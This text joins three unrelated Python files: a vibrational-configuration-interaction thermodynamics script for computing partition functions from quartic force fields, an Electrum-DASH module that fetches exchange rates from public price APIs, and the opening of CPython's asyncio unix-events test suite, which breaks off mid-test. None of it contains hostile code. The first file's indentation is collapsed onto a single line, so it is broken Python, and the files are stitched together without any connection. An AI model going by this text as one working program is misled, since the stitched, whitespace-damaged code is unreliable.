if(calVCI): VCImtrx = self.VCImatrix(w_omega,linrComb,Evlst,nmode,maxorder,FCQ3,FCQ4,Vref,Lambd) print(VCImtrx) Energylist, Coefficient = self.DiagonalVCI(VCImtrx) #np.savez("../data/VCImatxSaveN_"+str(maxn)+".npz",Energylist,Coefficient) else: filenameVCI = "../data/VCImatxSaveN_"+str(maxn)+".npz" inputfile = np.load(filenameVCI) Energylist= inputfile['arr_0'] Coefficient = inputfile['arr_1'] self.thermoresults = np.zeros((len(Temprt),3,4)) print("sum of FCI") print(np.sum(Energylist)) print("sum of FBBE") print(np.sum(w_omega)/2+3*np.sum(w_omega)/2) #XXX instruct: 7:7 temperatures 3: three methods 4: four variable(Xi,Omg,U,S) for ii in range(len(Temprt)): self.ThemoCalc(Temprt[ii],Energylist,self.thermoresults[ii,0,:]) self.FiniteBE(Temprt[ii],w_omega,maxn,self.thermoresults[ii,2,:]) # if (maxn == 6): # self.Bose_EinsteinStat(Temprt[ii],w_omega,self.thermoresults[ii,1,:]) #if(maxn == 20): #HatreeTocm = 219474.63 #w = Energylist #v = Coefficient #print("Loooooooooooooooooooooooooooooooook",maxn) #print(w[0:5]*HatreeTocm) ##print(v[:,2]) ##testl = v[:,0] ##for idxx in range(len(testl)): ## if(testl[idxx]>0.1): ## print("id xis ",idxx) ## print("value ", testl[idxx]) #print((w[1] -w[0])*219474.63) #print((w[2] -w[0])*219474.63) #print((w[3] -w[0])*219474.63) #print((w[4] -w[0])*219474.63) #print((w[5] -w[0])*219474.63) #print((w[6] -w[0])*219474.63) ##print((w[14] -w[7])*219474.63) ##print((w[15] -w[7])*219474.63) ##print((w[16] -w[7])*219474.63) ##print((w[17] -w[7])*219474.63) #print("Loooooooooooooooooooooooooooooooook") def loopfn(self,n,maxn): if n>1: rt = [] for x in range(maxn): k = self.loopfn(n-1,maxn) for i in range(len(k)): k[i].append(x) rt += k return rt else: rt = [] for x in range(maxn): rt.append([x]) return rt #It reads in the QFF force constants def readSindoPES(self,filepath,nmode): w_omega = np.zeros(nmode) FCQ3 = np.zeros((nmode,nmode,nmode)) #Coefficient in Q (normal coordinates) #XXX Coefficient includes the 1/2 1/3! 1/4! in the front!! 
#Dr.Yagi used dimensionless q as unit so we need to transfer from q to Q by times sqrt(w1*w2*.../hbar^(...)) FCQ4 = np.zeros((nmode,nmode,nmode,nmode)) with open(filepath) as f: flines = f.readlines() for idx in range(len(flines)): if( len(flines[idx].split())>1): if (flines[idx].split()[1] == "Hessian(i,i)"): tl = flines[idx+1].split()#shortcut for this line leng= len(tl) if (leng == 2): for i in range(nmode): tl2 = flines[idx+1+i].split() w_omega[i] = math.sqrt(float(tl2[1])) #print("Hessian",math.sqrt(float(tl2[1])/(1.88973**2*math.sqrt(1822.888486**2)))*219474.63) if (flines[idx].split()[1] == "Cubic(i,i,i)"): for i in range(nmode): tl = flines[idx+1+i].split()#shortcut for this line FCQ3[int(tl[0])-1,int(tl[0])-1,int(tl[0])-1] = float(tl[1]) #print("Cubic3",tl[1]) if (flines[idx].split()[1] == "Cubic(i,i,j)"): for i in range(nmode*2): tl = flines[idx+1+i].split()#shortcut for this line listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[1])-1] perm = permutations(listidx) for i in list(perm): FCQ3[i[0],i[1],i[2]] = float(tl[2]) #print("Cubic2",tl[2]) if (flines[idx].split()[1] == "Cubic(i,j,k)"): tl = flines[idx+1].split()#shortcut for this line listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[2])-1] perm = permutations(listidx) for i in list(perm): FCQ3[i[0],i[1],i[2]] = float(tl[3]) #print("Cubic1",tl[3]) if (flines[idx].split()[1] == "Quartic(i,i,i,i)"): for i in range(nmode): tl = flines[idx+1+i].split()#shortcut for this line FCQ4[int(tl[0])-1,int(tl[0])-1,int(tl[0])-1,int(tl[0])-1] = float(tl[1]) #print("Quar4",tl[1]) if (flines[idx].split()[1] == "Quartic(i,i,j,j)"): for i in range(nmode): tl = flines[idx+1+i].split()#shortcut for this line listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[1])-1,int(tl[1])-1] perm = permutations(listidx) for i in list(perm): FCQ4[i[0],i[1],i[2],i[3]] = float(tl[2]) #print("Quar22",tl[2]) if (flines[idx].split()[1] == "Quartic(i,i,i,j)"): for i in range(nmode*2): tl = flines[idx+1+i].split()#shortcut for this line listidx = 
[int(tl[0])-1,int(tl[0])-1,int(tl[0])-1,int(tl[1])-1] perm = permutations(listidx) for i in list(perm): FCQ4[i[0],i[1],i[2],i[3]] = float(tl[2]) #print("Quar21",tl[2]) if (flines[idx].split()[1] == "Quartic(i,i,j,k)"): for i in range(nmode): tl = flines[idx+1+i].split()#shortcut for this line listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[1])-1,int(tl[2])-1] perm = permutations(listidx) for i in list(perm): FCQ4[i[0],i[1],i[2],i[3]] = float(tl[3]) #print("Quar3",tl[3]) FCQ3 = np.true_divide(FCQ3,(1.88973**3*math.sqrt(1822.888486**3))) FCQ4 = np.true_divide(FCQ4,(1.88973**4*math.sqrt(1822.888486**4))) w_omega = np.true_divide(w_omega,math.sqrt(1.88973**2*1822.888486)) #FCQ4[key] /= (1.88973**4*math.sqrt(1822.888486**4)) #FCQ3 /= (1.88973**3*math.sqrt(1822.888486**3)) #for idx in range(Omgstartidx+1,FCstartidx): # w_omega[widx] = float(tl[0]) # widx += 1 #for idx in range(FCstartidx+1, len(flines)): # tl = flines[idx].split()#shortcut for this line # leng = len(tl) # if (leng == 4): # #third order force constant # #FCQ3[int(tl[1])-1,int(tl[2])-1,int(tl[3])-1] = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]) # temp1 = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]) # FCQ3[int(tl[1])-1,int(tl[2])-1,int(tl[3])-1] = temp1 # FCQ3[int(tl[1])-1,int(tl[3])-1,int(tl[2])-1] = temp1 # FCQ3[int(tl[2])-1,int(tl[1])-1,int(tl[3])-1] = temp1 # FCQ3[int(tl[2])-1,int(tl[3])-1,int(tl[1])-1] = temp1 # FCQ3[int(tl[3])-1,int(tl[1])-1,int(tl[2])-1] = temp1 # FCQ3[int(tl[3])-1,int(tl[2])-1,int(tl[1])-1] = temp1 # if (leng == 5): # #forth order force constant # #FCQ4[int(tl[1])-1,int(tl[2])-1,int(tl[3])-1,int(tl[4])-1] = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]*w_omega[int(tl[4])-1]) # temp2 = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]*w_omega[int(tl[4])-1]) # perm = permutations([1,2,3,4]) # for i in list(perm): # 
FCQ4[int(tl[i[0]])-1,int(tl[i[1]])-1,int(tl[i[2]])-1,int(tl[i[3]])-1] = temp2 HatreeTocm = 219474.63 #print("harmonic oscilator:") #print(w_omega[0]*HatreeTocm) #print(w_omega[1]*HatreeTocm) #print(w_omega[2]*HatreeTocm) #print("Harmonic ZPE") #print(np.sum(w_omega)/2*HatreeTocm) return w_omega,FCQ3,FCQ4 def EvaluationList(self,nmode,w_omega,maxn,maxorder): #I used the combination to determine which operator can give us result. #The 1st is to indicate which normal mode is it. #The 2nd is to indicate which operator: 0-5 : zero(no operator, assume the basis function is orthogonal, partial deriv Q^2, Q, Q^2, Q^3, Q^4. Here we used QFF so the max order of operator is 4 and total number is 5 #The 3rd is to the which level n is, n is the bigger one than n' #The 4th is the difference between n and n' Evlst = np.zeros((nmode,maxorder,maxn,maxorder)) for i in range(nmode): for n in range(maxn): Evlst[i,0,n,0] = - w_omega[i]*(n+0.5) Evlst[i,0,n,2] = w_omega[i]*math.sqrt(n*(n-1))/2 Evlst[i,1,n,1] = math.sqrt(n/2/w_omega[i]) Evlst[i,2,n,0] = (n+0.5)/w_omega[i] Evlst[i,2,n,2] = math.sqrt(n*(n-1))/2/w_omega[i] Evlst[i,3,n,1] = 3*n/2/w_omega[i]*math.sqrt(n/2/w_omega[i]) Evlst[i,3,n,3] = math.sqrt(n*(n-1)*(n-2))/(2*w_omega[i]*math.sqrt(2*w_omega[i])) Evlst[i,4,n,0] = (6*n*(n+1)+3)/4/(w_omega[i]**2) Evlst[i,4,n,2] = (n-0.5)*math.sqrt(n*(n-1))/(w_omega[i]**2) Evlst[i,4,n,4] = math.sqrt(n*(n-1)*(n-2)*(n-3))/4/(w_omega[i]**2) return Evlst def VCImatrix(self,w_omega,linrComb,Evlst,nmode,maxorder,FCQ3,FCQ4,Vref,Lambd): leng = len(linrComb) VCImtrx = np.zeros((leng,leng)) #VCI matrix is Hermitian for i in range(leng): for j in range(i,leng): lhs = linrComb[i] rhs = linrComb[j] sumofoperator = 0 #parse each operator first #operator partial deriv: for optidx in range(nmode): #parse each mode in |xxxx> multply = 1 #the multiply product of each mode for modeidx in range(nmode): n = max(lhs[modeidx],rhs[modeidx]) diff = abs(lhs[modeidx] - rhs[modeidx]) if (modeidx == optidx and diff < 
maxorder): #the operator works on the correspoding Q multply *= -0.5*Evlst[modeidx,0,n,diff] else: #check if they are orthogonal if not, then zero if (diff!=0): multply *= 0 break sumofoperator += multply #operator Vref #Vref is a constant so only orthogonal can give the value multply = 1 for modeidx in range(nmode): diff = abs(lhs[modeidx] - rhs[modeidx]) if (diff!=0): multply *=0 break sumofoperator += multply*Vref #operator sum FiQi #for harmonic oscilator Fi = 0 so we pass this term #Fij = w_omega ^2 for i == j for forceidx in range(nmode): multply = 1 #print(" For F_ii i is ",forceidx) for modeidx in range(nmode): diff = abs(lhs[modeidx] - rhs[modeidx]) n = max(lhs[modeidx],rhs[modeidx]) if (forceidx == modeidx and diff < maxorder): multply *= 0.5*Evlst[modeidx,2,n,diff] else: if (diff !=0): multply *= 0 break multply*=(w_omega[forceidx]**2) sumofoperator += multply #print("------------------") #print("For Fijk ") #operator sum Fijk Qi Qj Qk for ii in range(nmode): for jj in range(nmode): for kk in range(nmode): multply = 1 eachcount = Counter([ii,jj,kk]) tempstore = [] for modeidx in range(nmode): diff = abs(lhs[modeidx] - rhs[modeidx]) n = max(lhs[modeidx],rhs[modeidx]) numberofmodeinFC = eachcount[modeidx] if (numberofmodeinFC != 0 and diff < maxorder): multply*= Evlst[modeidx,numberofmodeinFC,n,diff] else: if(diff != 0): multply*=0 break multply *= FCQ3[ii,jj,kk] sumofoperator+=Lambd*multply/6 #operator sum Fijkl Qi Qj Qk Ql for ii in range(nmode): for jj in range(nmode): for kk in range(nmode): for ll in range(nmode): multply = 1 eachcount = Counter([ii,jj,kk,ll]) for modeidx in range(nmode): diff = abs(lhs[modeidx] - rhs[modeidx]) n = max(lhs[modeidx],rhs[modeidx]) numberofmodeinFC = eachcount[modeidx] if (numberofmodeinFC != 0 and diff < maxorder): multply*= Evlst[modeidx,numberofmodeinFC,n,diff] else: if(diff!=0): multply*=0 break #break the innerest loop since they will be all zero. 
multply*=FCQ4[ii,jj,kk,ll] sumofoperator+=Lambd*multply/24 VCImtrx[i,j] = VCImtrx[j,i] = sumofoperator return VCImtrx def DiagonalVCI(self,VCImtrx): w,v = linalg.eigh(VCImtrx) HatreeTocm = 219474.63 print(w) print(w*HatreeTocm) #for i in range(len(w)): # print("_+++++++++++++++++++++++++++++++++++++") # print(w[i]*HatreeTocm) # print("Then the Coeff") # print(v[:,i]) #print(w*HatreeTocm) #print(np.sum(w)) #print((w[1] -w[0])*219474.63) #print((w[2] -w[0])*219474.63) #print((w[3] -w[0])*219474.63) #print((w[4] -w[0])*219474.63) #print((w[5] -w[0])*219474.63) return w,v def ThemoCalc(self,Temprt,Energylist,ret): #kb = 1 at a.u. #Calculate Grand partition function, grand potential and internal energy based on grand canonical ensemble. #Grand partition function: GPF b_beta = 1/(Temprt) print(b_beta) GPF_Xi = 0 print(np.sum(Energylist)) for eachE in Energylist: GPF_Xi += math.exp(-b_beta*eachE) print("FCI Xi") print(GPF_Xi) #grand potential GP_Omg = -math.log(GPF_Xi)/b_beta #internal energy U IE_U = 0 for eachE in Energylist: IE_U += eachE*math.exp(-b_beta * eachE) IE_U/=GPF_Xi #entropy S entropy_S = 0 #just for math domain error for eachE in Energylist: entropy_S += eachE*math.exp(-b_beta*eachE) entropy_S /= (Temprt*GPF_Xi) entropy_S += math.log(GPF_Xi) ret[0] = GPF_Xi ret[1] = GP_Omg ret[2] = IE_U ret[3] = entropy_S print("Xi, Omg, U ,S is") #print(GPF_Xi) #print(IE_U) #print(entropy_S) print("verify") print(GP_Omg) print(IE_U-Temprt*entropy_S) #Bose-Einstein statistics def Bose_EinsteinStat(self,Temprt,w_omega,ret): b_beta= 1/Temprt #f_i f_i = np.zeros(len(w_omega)) for i in range(len(w_omega)): f_i[i] = 1/(1-math.exp(-b_beta*w_omega[i])) print(f_i) #partition function GPF_Xi = 1 for ii in range(len(w_omega)): #GPF_Xi *= math.exp(-b_beta*eachw/2)/(1-math.exp(-b_beta*eachw)) GPF_Xi *= math.exp(-b_beta*w_omega[ii]/2)*f_i[ii] #grand potential GP_Omg = 0 for eachw in w_omega: GP_Omg += 0.5*eachw + math.log(1-math.exp(-b_beta*eachw))/b_beta #internal energy IE_U = 0 for 
eachw in w_omega: IE_U += 0.5*eachw + eachw*math.exp(-b_beta*eachw)/(1-math.exp(-b_beta*eachw)) #entropy entropy_S = 0 for eachw in w_omega: entropy_S += - math.log(1-math.exp(-b_beta*eachw)) + eachw*math.exp(-b_beta*eachw)/(Temprt*(1-math.exp(-b_beta*eachw))) ret[0] = GPF_Xi ret[1] = GP_Omg ret[2] = IE_U ret[3] = entropy_S #print("analytical Bose-Einstein stat result:") #print("Xi, Omg, U ,S is") #print(GPF_Xi) #print(IE_U) #print(entropy_S) #print("verify") #print(GP_Omg) #print(IE_U-Temprt*entropy_S) #FCI bose-einstein with finite N def FiniteBE(self,Temprt,w_omega,maxn,ret): N = maxn -1 b_beta = 1/Temprt f_i = np.zeros(len(w_omega)) tildef_i = np.zeros(len(w_omega)) for i in range(len(w_omega)): f_i[i] = 1/(1 - math.exp(- b_beta * w_omega[i])) tildef_i[i] = 1/(1 - math.exp( - b_beta * (N+1) * w_omega[i])) #partition function GPF_Xi = 1 for eachw in w_omega: GPF_Xi *= math.exp(-b_beta*eachw/2)*(1-math.exp(-b_beta*(N+1)*eachw))/(1-math.exp(-b_beta*eachw)) print("Finite BE") print(GPF_Xi) #Grand Potential GP_Omg = 0 for ii in range(len(w_omega)): GP_Omg += 0.5 * w_omega[ii] - math.log(f_i[ii]/tildef_i[ii])/b_beta #Internal Energy IE_U = 0 for ii in range(len(w_omega)): IE_U += 0.5 * w_omega[ii] + w_omega[ii]*(f_i[ii] - 1) - (N + 1) * w_omega[ii] * (tildef_i[ii] - 1) #entropy S entropy_S = 0 for ii in range(len(w_omega)): entropy_S += (math.log(f_i[ii]/tildef_i[ii])/b_beta + w_omega[ii]*(f_i[ii]-1) - (N+1)*w_omega[ii]*(tildef_i[ii]-1))/Temprt ret[0] = GPF_Xi ret[1] = GP_Omg ret[2] = IE_U ret[3] = entropy_S #print("finite analytical Bose-Einstein stat result:") #print("Xi, Omg, U ,S is") #print(GPF_Xi) #print(IE_U) #print(entropy_S) #print("verify") #print(IE_U-Temprt*entropy_S) #print(GP_Omg) def multitask(Temprt,Energylist,thermoresults): for ii in range(len(Temprt)): ThemoCalc(Temprt[ii],Energylist,thermoresults[ii,0,:]) Bose_EinsteinStat(Temprt[ii],w_omega,thermoresults[ii,1,:]) FiniteBE(Temprt[ii],w_omega,maxn,thermoresults[ii,2,:]) 
#np.save("../data/thermoresult_Lambda0",thermoresults)


def Parallel_VCI(maxn, Lambd, Temprt, calVCI):
    """Run one VCI thermodynamics calculation and save the result grid.

    Instantiates VCIthermo (defined earlier in this file) for the given
    truncation level `maxn`, coupling `Lambd`, temperature grid `Temprt`
    and VCI flag `calVCI`, then writes the thermodynamic results to disk.
    """
    job = VCIthermo(Lambd, Temprt, maxn, calVCI)
    np.save("../data/Temprtgrid_n_" + str(maxn) + ".npy", job.thermoresults)


# Earlier variant kept for reference: wrote one CSV per index instead of
# a single .npy grid.
#def Parallel_VCI(Temprt,maxn,Lambd,idx):
#    filename = "../data/figuremakingup_"+str(idx)+".csv"
#    vcirun = VCIthermo(Lambd,Temprt,maxn,calVCI)
#    reslt = vcirun.thermoresults
#    if (len(reslt[:,0,0])!= 1):
#        print("error")
#    with open(filename,'w') as csvfile:
#        csvwriter = csv.writer(csvfile)
#        for i in range(3):
#            #for ii in range(len(Temprt)):
#            csvwriter.writerow([reslt[0,i,0],reslt[0,i,1],reslt[0,i,2],reslt[0,i,3]])

# Number of normal modes (e.g. 3 for H2O) is currently hard-coded elsewhere;
# could later be read from the input file.
#nmode = 3

# Maximum number of excited levels per mode to scan over.
maxnlist = [4,6]#8,10,12,14,16,18,20]

# Maximum order of the force field (QFF is 5 including the kinetic operator).
#maxorder = 5
# By default Vref = 0.
#Vref = 0

# Temperature is given in K, converted to atomic units via
# 3.1577464e5 K (= Eh / kb).
Ehbykb = 3.1577464*100000
Temprt = np.array([100,1000,10000,100000,1000000,10000000,100000000])
# Alternative: a logarithmic temperature grid.
#Tlist = np.arange(2,8.1,0.1)
#Temprt = np.zeros(np.shape(Tlist))
#for i in range(np.shape(Tlist)[0]):
#    Temprt[i] = 10**(Tlist[i])
Temprt = Temprt / Ehbykb

calVCI = 1
Lambd = 0
maxn = 2

# Single serial run at the settings above.
vcirun = VCIthermo(Lambd, Temprt, maxn, calVCI)

#linrComb = loopfn(nmode,maxn)
#filepath = "../data/prop_no_1.mop"
#Lambdlist = [0.3,0.2,0.1,0.01,0.001,0.0001]
#w_omega,FCQ3,FCQ4 = readSindoPES(filepath,nmode)
#Evlst = EvaluationList(nmode,w_omega,maxn,maxorder)# The list of the evaluation from Hermes xvscf table.
#VCImtrx = VCImatrix(linrComb,Evlst,nmode,maxorder,FCQ3,FCQ4,Vref,Lambd)
#Energylist, Coefficient = DiagonalVCI(VCImtrx)
#XXX instruct: 7:7 temperatures 3: three methods 4: four variable(Xi,Omg,U,S)
# diffN for 7 temperature
# Parallel scan over maxnlist via multiprocessing, kept for reference:
#procs = []
#for ii in range(len(maxnlist)):
#    proc = Process(target = Parallel_VCI, args= (Temprt,maxnlist[ii],Lambd))
#    procs.append(proc)
#    proc.start()
#for procc in procs:
#    procc.join()
#temprtlist = np.array([500,5000,50000,100000,100000])
#temprtlist = temprtlist/Ehbykb
#procs = []
#for ii in range(len(maxnlist)):
#    proc = Process(target = Parallel_VCI, args= ([maxnlist[ii],Lambd,Temprt,calVCI]))
#    procs.append(proc)
#    proc.start()
#for procc in procs:
#    procc.join()
#multitask(Temprt,Energylist,thermoresults)

# Wall-clock timing; t0 is recorded near the top of the file.
t1 = time.time()
print("time is /min",(t1-t0)/60)
#sys.stdout.close()
exchange_rate.py
"""Fiat exchange-rate support for Electrum-DASH.

Fetches DASH spot quotes (and, where an exchange supports it, historical
rates) on background threads and exposes them through `FxThread`.

NOTE(review): this module uses Python 2 idioms (`dict.iteritems`,
`Thread.setDaemon`, bare `except:`) consistently; they are preserved here.
"""

from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import traceback
import csv
from decimal import Decimal

from bitcoin import COIN
from i18n import _
from util import PrintError, ThreadJob
from util import format_satoshis


# Decimal places used when formatting each fiat currency.
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
                  'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
                  'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
                  'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
                  'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
                  'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0,
                  # Not ISO 4217.
                  'BTC': 8}

DEFAULT_EXCHANGE = 'Bittrex'
DEFAULT_CCY = 'BTC'


class ExchangeBase(PrintError):
    """Base class for rate providers; subclasses implement get_rates()."""

    def __init__(self, on_quotes, on_history):
        self.history = {}
        self.quotes = {}
        self.on_quotes = on_quotes
        self.on_history = on_history

    def get_json(self, site, get_string):
        """GET https://<site><get_string> and decode the JSON body."""
        # APIs must have https
        url = ''.join(['https://', site, get_string])
        response = requests.request(
            'GET', url, headers={'User-Agent': 'Electrum-DASH'})
        return response.json()

    def get_csv(self, site, get_string):
        """GET https://<site><get_string> and parse the body as CSV rows."""
        url = ''.join(['https://', site, get_string])
        response = requests.request(
            'GET', url, headers={'User-Agent': 'Electrum-DASH'})
        reader = csv.DictReader(response.content.split('\n'))
        return list(reader)

    def name(self):
        return self.__class__.__name__

    def update_safe(self, ccy):
        """Fetch quotes for `ccy`; never raises, always fires on_quotes."""
        try:
            self.print_error("getting fx quotes for", ccy)
            self.quotes = self.get_rates(ccy)
            self.print_error("received fx quotes")
        except BaseException as e:
            self.print_error("failed fx quotes:", e)
        self.on_quotes()

    def update(self, ccy):
        """Kick off a quote refresh on a daemon thread."""
        worker = Thread(target=self.update_safe, args=(ccy,))
        worker.setDaemon(True)
        worker.start()

    def get_historical_rates_safe(self, ccy):
        """Fetch historical rates for `ccy`; swallows all errors."""
        try:
            self.print_error("requesting fx history for", ccy)
            self.history[ccy] = self.historical_rates(ccy)
            self.print_error("received fx history for", ccy)
            self.on_history()
        except BaseException as e:
            self.print_error("failed fx history:", e)

    def get_historical_rates(self, ccy):
        """Return cached history for `ccy`, fetching in the background
        if absent and the exchange supports history for that currency."""
        cached = self.history.get(ccy)
        if not cached and ccy in self.history_ccys():
            worker = Thread(target=self.get_historical_rates_safe, args=(ccy,))
            worker.setDaemon(True)
            worker.start()
        return cached

    def history_ccys(self):
        # Overridden by exchanges that provide historical data.
        return []

    def historical_rate(self, ccy, d_t):
        """Rate for `ccy` on the date of datetime `d_t`, or None."""
        return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))

    def get_currencies(self):
        """Three-letter currency codes this exchange quotes, sorted."""
        rates = self.get_rates('')
        return sorted([str(code) for (code, rate) in rates.iteritems()
                       if rate is not None and len(code) == 3])


class Bittrex(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('bittrex.com',
                             '/api/v1.1/public/getticker?market=BTC-DASH')
        quote_currencies = {}
        if not json.get('success', False):
            return quote_currencies
        quote_currencies['BTC'] = Decimal(json['result']['Last'])
        return quote_currencies


class Poloniex(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('poloniex.com', '/public?command=returnTicker')
        quote_currencies = {}
        dash_ticker = json.get('BTC_DASH')
        quote_currencies['BTC'] = Decimal(dash_ticker['last'])
        return quote_currencies


class CoinMarketCap(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('api.coinmarketcap.com', '/v1/ticker/dash/')
        quote_currencies = {}
        if not isinstance(json, list):
            return quote_currencies
        json = json[0]
        for ccy, key in [
            ('USD', 'price_usd'),
            ('BTC', 'price_btc'),
        ]:
            quote_currencies[ccy] = Decimal(json[key])
        return quote_currencies


def dictinvert(d):
    """Invert {key: [values]} into {value: [keys]}."""
    inv = {}
    for k, vlist in d.iteritems():
        for v in vlist:
            inv.setdefault(v, []).append(k)
    return inv


def get_exchanges_and_currencies():
    """Map exchange name -> supported currency codes.

    Loads the cached currencies.json next to this module if present;
    otherwise queries every ExchangeBase subclass and writes the cache.
    """
    import os, json
    path = os.path.join(os.path.dirname(__file__), 'currencies.json')
    try:
        return json.loads(open(path, 'r').read())
    except:
        pass
    d = {}
    is_exchange = lambda obj: (inspect.isclass(obj)
                               and issubclass(obj, ExchangeBase)
                               and obj != ExchangeBase)
    exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
    for name, klass in exchanges.items():
        exchange = klass(None, None)
        try:
            d[name] = exchange.get_currencies()
        except:
            continue
    with open(path, 'w') as f:
        f.write(json.dumps(d, indent=4, sort_keys=True))
    return d


CURRENCIES = get_exchanges_and_currencies()


def get_exchanges_by_ccy(history=True):
    """Map currency code -> exchanges quoting it (history-capable only
    when `history` is True)."""
    if not history:
        return dictinvert(CURRENCIES)
    d = {}
    for name in CURRENCIES.keys():
        klass = globals()[name]
        exchange = klass(None, None)
        d[name] = exchange.history_ccys()
    return dictinvert(d)


class FxThread(ThreadJob):
    """Periodic job that keeps fiat quotes (and optional history) fresh."""

    def __init__(self, config, network):
        self.config = config
        self.network = network
        self.ccy = self.get_currency()
        self.history_used_spot = False
        self.ccy_combo = None
        self.hist_checkbox = None
        self.set_exchange(self.config_exchange())

    def get_currencies(self, h):
        return sorted(get_exchanges_by_ccy(h).keys())

    def get_exchanges_by_ccy(self, ccy, h):
        return get_exchanges_by_ccy(h).get(ccy, [])

    def ccy_amount_str(self, amount, commas):
        """Format `amount` with the configured currency's precision."""
        prec = CCY_PRECISIONS.get(self.ccy, 2)
        fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
        return fmt_str.format(round(amount, prec))

    def run(self):
        # This runs from the plugins thread which catches exceptions
        if self.is_enabled():
            if self.timeout == 0 and self.show_history():
                self.exchange.get_historical_rates(self.ccy)
            if self.timeout <= time.time():
                # Refresh quotes roughly every 150 seconds.
                self.timeout = time.time() + 150
                self.exchange.update(self.ccy)

    def is_enabled(self):
        return bool(self.config.get('use_exchange_rate'))

    def set_enabled(self, b):
        return self.config.set_key('use_exchange_rate', bool(b))

    def get_history_config(self):
        return bool(self.config.get('history_rates'))

    def set_history_config(self, b):
        self.config.set_key('history_rates', bool(b))

    def get_currency(self):
        '''Use when dynamic fetching is needed'''
        return self.config.get("currency", DEFAULT_CCY)

    def config_exchange(self):
        return self.config.get('use_exchange', DEFAULT_EXCHANGE)

    def show_history(self):
        return (self.is_enabled()
                and self.get_history_config()
                and self.ccy in self.exchange.history_ccys())

    def set_currency(self, ccy):
        self.ccy = ccy
        self.config.set_key('currency', ccy, True)
        self.timeout = 0  # Because self.ccy changes
        self.on_quotes()

    def set_exchange(self, name):
        class_ = globals().get(name, Bittrex)
        self.print_error("using exchange", name)
        if self.config_exchange() != name:
            self.config.set_key('use_exchange', name, True)
        self.exchange = class_(self.on_quotes, self.on_history)
        # A new exchange means new fx quotes, initially empty.  Force
        # a quote refresh
        self.timeout = 0

    def on_quotes(self):
        self.network.trigger_callback('on_quotes')

    def on_history(self):
        self.network.trigger_callback('on_history')

    def exchange_rate(self):
        '''Returns None, or the exchange rate as a Decimal'''
        rate = self.exchange.quotes.get(self.ccy)
        if rate:
            return Decimal(rate)

    def format_amount_and_units(self, btc_balance):
        rate = self.exchange_rate()
        if rate is None:
            return ''
        return "%s %s" % (self.value_str(btc_balance, rate), self.ccy)

    def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
        rate = self.exchange_rate()
        if rate is None:
            return _(" (No FX rate available)")
        return " 1 %s~%s %s" % (
            base_unit,
            self.value_str(COIN / (10**(8 - decimal_point)), rate),
            self.ccy)

    def value_str(self, satoshis, rate):
        if satoshis is None:  # Can happen with incomplete history
            return _("Unknown")
        if rate:
            value = Decimal(satoshis) / COIN * Decimal(rate)
            return "%s" % (self.ccy_amount_str(value, True))
        return _("No data")

    def history_rate(self, d_t):
        rate = self.exchange.historical_rate(self.ccy, d_t)
        # Frequently there is no rate for today, until tomorrow :)
        # Use spot quotes in that case
        if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
            rate = self.exchange.quotes.get(self.ccy)
            self.history_used_spot = True
        return rate

    def historical_value_str(self, satoshis, d_t):
        rate = self.history_rate(d_t)
        return self.value_str(satoshis, rate)
test_unix_events.py
"""Tests for unix_events.py.""" import collections import contextlib import errno import io import os import pathlib import signal import socket import stat import sys import tempfile import threading import unittest from unittest import mock from test import support if sys.platform == 'win32': raise unittest.SkipTest('UNIX only') import asyncio from asyncio import log from asyncio import base_events from asyncio import events from asyncio import unix_events from test.test_asyncio import utils as test_utils MOCK_ANY = mock.ANY def tearDownModule(): asyncio.set_event_loop_policy(None) def close_pipe_transport(transport): # Don't call transport.close() because the event loop and the selector # are mocked if transport._pipe is None: return transport._pipe.close() transport._pipe = None @unittest.skipUnless(signal, 'Signals are not supported') class SelectorEventLoopSignalTests(test_utils.TestCase): def setUp(self): super().setUp() self.loop = asyncio.SelectorEventLoop() self.set_event_loop(self.loop) def test_check_signal(self): self.assertRaises( TypeError, self.loop._check_signal, '1') self.assertRaises( ValueError, self.loop._check_signal, signal.NSIG + 1) def test_handle_signal_no_handler(self): self.loop._handle_signal(signal.NSIG + 1) def test_handle_signal_cancelled_handler(self): h = asyncio.Handle(mock.Mock(), (), loop=mock.Mock()) h.cancel() self.loop._signal_handlers[signal.NSIG + 1] = h self.loop.remove_signal_handler = mock.Mock() self.loop._handle_signal(signal.NSIG + 1) self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1) @mock.patch('asyncio.unix_events.signal') def test_add_signal_handler_setup_error(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals m_signal.set_wakeup_fd.side_effect = ValueError self.assertRaises( RuntimeError, self.loop.add_signal_handler, signal.SIGINT, lambda: True) @mock.patch('asyncio.unix_events.signal') def test_add_signal_handler_coroutine_error(self, m_signal): 
